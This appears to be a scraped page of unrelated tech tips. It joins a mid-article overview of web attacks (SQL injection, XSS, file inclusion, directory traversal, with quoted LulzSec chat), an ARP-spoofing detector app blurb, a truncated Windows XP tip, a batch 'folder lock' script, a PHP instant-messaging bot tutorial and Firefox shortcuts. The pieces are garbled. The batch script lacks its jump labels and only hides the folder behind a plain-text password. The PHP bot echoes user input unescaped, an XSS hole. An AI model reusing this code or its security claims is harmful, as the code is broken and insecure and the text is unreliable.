According to the Privacy Rights Clearinghouse, over 313 million records were compromised by external hacking events since 2005. Some 262 million of these consisted of breaches at TJX, Heartland Payment Systems and RockYou - all SQLi attacks.
While the SQLi vulnerability is more than a decade-old attack technique, we can see it still tops the charts and accounts for at least 83% of all successful hacks. Last April, a SQLi attack against Sony resulted in the compromise of 77 million credit cards. Even Lady Gaga’s site was hacked by SQLi.
Web attack technique #2: Cross Site Scripting (XSS)
A successful cross site scripting attack allows the hacker to execute scripts in a victim’s browser. The script may redirect the visitor to an attacker-controlled website, to steal user credentials or simply to insert hostile content.
XSS is a peculiar attack. With XSS, the attacker abuses the trust between the application and the user. It is not a web attack against the server per se, but rather against the site’s visitors. However, this type of attack still continues to fall under the responsibility of the site administrators since the exploit occurs due to existing flaws on the server side.
XSS in the wild
Numerous applications suffer from XSS vulnerabilities. Even Microsoft’s fastest growing product to date—Sharepoint—has been found vulnerable to this attack, and Redmond’s latest patch included a fix to this. Hackers are quick to leach onto this type of vulnerability and LulzSec has been known to also use XSS as part of their hacking arsenal.
Web attack technique #3: Local File Inclusion (LFI)
In this setting, a web application is programmed to upload a local file. However, if the application is vulnerable to a Local File Inclusion attack, the hacker can replace that reference with a file of her own that she was able to previously plant on the server. Once the malicious script is uploaded, the server is under control of the hacker. The hacker can glean information, manipulate data and even upload a malicious executable.
LFI in the wild
Attractive LFI (and RFI - see below) attack targets are commonly PHP applications. With more than 77% of today’s websites running PHP, LFI should be on every security practitioner’s radar.
A notorious LFI exploit includes Timthumb - a WordPress add-on vulnerable to LFI which in November 2011 paved the way to 1.2 million infected websites.
Web attack technique #4: Remote File Inclusion (RFI)
This attack is similar in essence to LFI attacks, although in this case the web application is programmed to upload an external file.
RFI in the wild
The following snippet is taken from the LulzSec chat logs. It shows that RFI was one of the techniques used by the group to conduct their attacks.
lol - storm would you also like the RFI/LFI bot with google bypass i was talking about while i have this plugged in?
lol - i used to load about 8,000 RFI with usp flooder crushed most server :D
As we can see, LulzSec used bots to carry out RFI attacks, which led to the crashing of the servers (in other words, using RFI as a technique to conduct a DDoS attack). In fact, this was the technique used to bring down the CIA public website.
RFI is not a widely discussed attack and is often overlooked. But Lulzsec proved the consequence of such a vulnerability when they exploited it to help ambush their targets.
Web attack technique #5: Directory Traversal (DT)
As the name hints, in a directory traversal attack, a hacker traverses the web application’s file directory in an attempt to find hidden files that were inadvertently exposed to the application.
Say for example, a parent directory should not be accessed. By exploiting a DT vulnerability, a hacker will be able to retrieve information from the directory by using special characters such as the ‘.’, which requests to "traverse" to the file’s parent directory.
DT in the wild
DTs are commonly used for reconnaissance. When the hacker extracts enough information about the targeted victim, it can proceed to carry out an additional attack.
In particular, this attack is mainly used in conjunction with RFI/ LFI attacks: the DT maps out the vulnerabilities for a subsequent RFI/ LFI attack to exploit.

Detects and protects from all kinds of ARP (Address Resolution Protocol) related attacks in Wi-Fi networks, like DOS (Denial Of Service) or MITM (Man In The Middle) Attack.
Protects your phone from tools like FaceNiff, Cain & Abel, ANTI, ettercap, DroidSheep, NetCut, and all others that try to hijack your session via MITM through ARP spoofing / ARP poisoning.
– Uses very few resources
– Uses no resources if Wi-Fi is disabled
– Nearly zero battery consumption
– Requires very few permissions. Requests only absolutely necessary permissions
– No configuration required, works off the shelf for novices
– Experts can change many settings to adapt the app to their needs
– Undetectable by the bad guy
– 100% silent and passive inside the network. Generates no noise
– Highly customizable notifications
– Plays ringtone on attack (optional)
– Vibrates in a given pattern on attack (optional)
– Easy to use one-click-interface as well as detailed network view for experts
– “Immunity” protects you without disabling Wi-Fi (root required)
– Can also disable Wi-Fi if you don’t have root access to your phone
– Logging of all spoofing attempts with details about the network and the attacker
– Works in complex wireless LANs, like vWLAN and WDS (please see FAQ)
– Detects networks already under attack
– Automatic countermeasures


How to remove Recycle Bin Icon from Desktop
If using XP Pro
On the right hand pane find ” Remove Recycle Bin icon on the desktop ” , double left click on it to ENABLE it.
If using XP Home
Create or modify the following registry entry

Folder Lock With Password Without Any Software-
Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').
Any name will do.
Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
echo Invalid password
goto end
md Locker
echo Locker created successfully
goto End

-: Creating IM Bot :-

This quick tutorial will show you how to develop your own functional IM bot that works with Google Talk, Yahoo! Messenger, Windows Live and all other popular instant messaging clients. To get started, all you need to know are some very basic programming skills (any language would do) and web space to host your “bot”.
For this example, I have created a dummy bot called “insecure” that listens to your IM messages. To see this live, add to your GTalk buddy list and start chatting.

If you like to write a personal IM bot, just follow these simple steps:-
Step 1: Go to and register a new account with a bot.
Step 2: Now it’s time to create a bot which is actually a simple script that resides on your public web server.
It could be in PHP, Perl, Python or any other language.
Example Hello World bot:
The example below illustrates just how easy it is to create a bot.
This example is coded in PHP.
switch ($_REQUEST['step']) {
case 1:
echo "Hi, what's your name?";
case 2:
echo "Hi " . $_REQUEST['value1'] . ", where do you live?";
case 3:
echo "Well, welcome to this hello world bot, " . $_REQUEST['value1'] . "<br>from " . $_REQUEST['value2'] . ".<reset>";
Step 3: Once your script is ready, put it somewhere on your web server and copy the full URL to the clipboard.
Step 4: Now login to your imified account, paste the script URL

Screen Name:
Bot Script URL:

Step 5: Add that im bot your friends list. That’s it.
This is a very basic bot but the possibilities are endless.
For instance, you could write a bot that will send an email to all your close friends via a simple IM message. Or you could write one that will does currency conversion.

FireFox Keyboard Shortcuts

  1. Press CTRL + L to directly go to the address bar.
  2. To copy URL of websites from address bar Simply single click on the URL, this will select the whole address, then use CTRL + C for copying and CTRL + V for pasting.
  3. Press Spacebar to scroll down the page.
  4. Press Shift + Spacebar for quickly scrolling up.
  5. Use CTRL + T to open a New Tab
  6. Use CTRL + W to close the Tab
  7. If you use certain website more frequently bookmark that site by simply pressing CTRL + D for easily accessing later.
  8. To find certain word or phrase in web page press CTRL + F and use ALT + N for finding Next.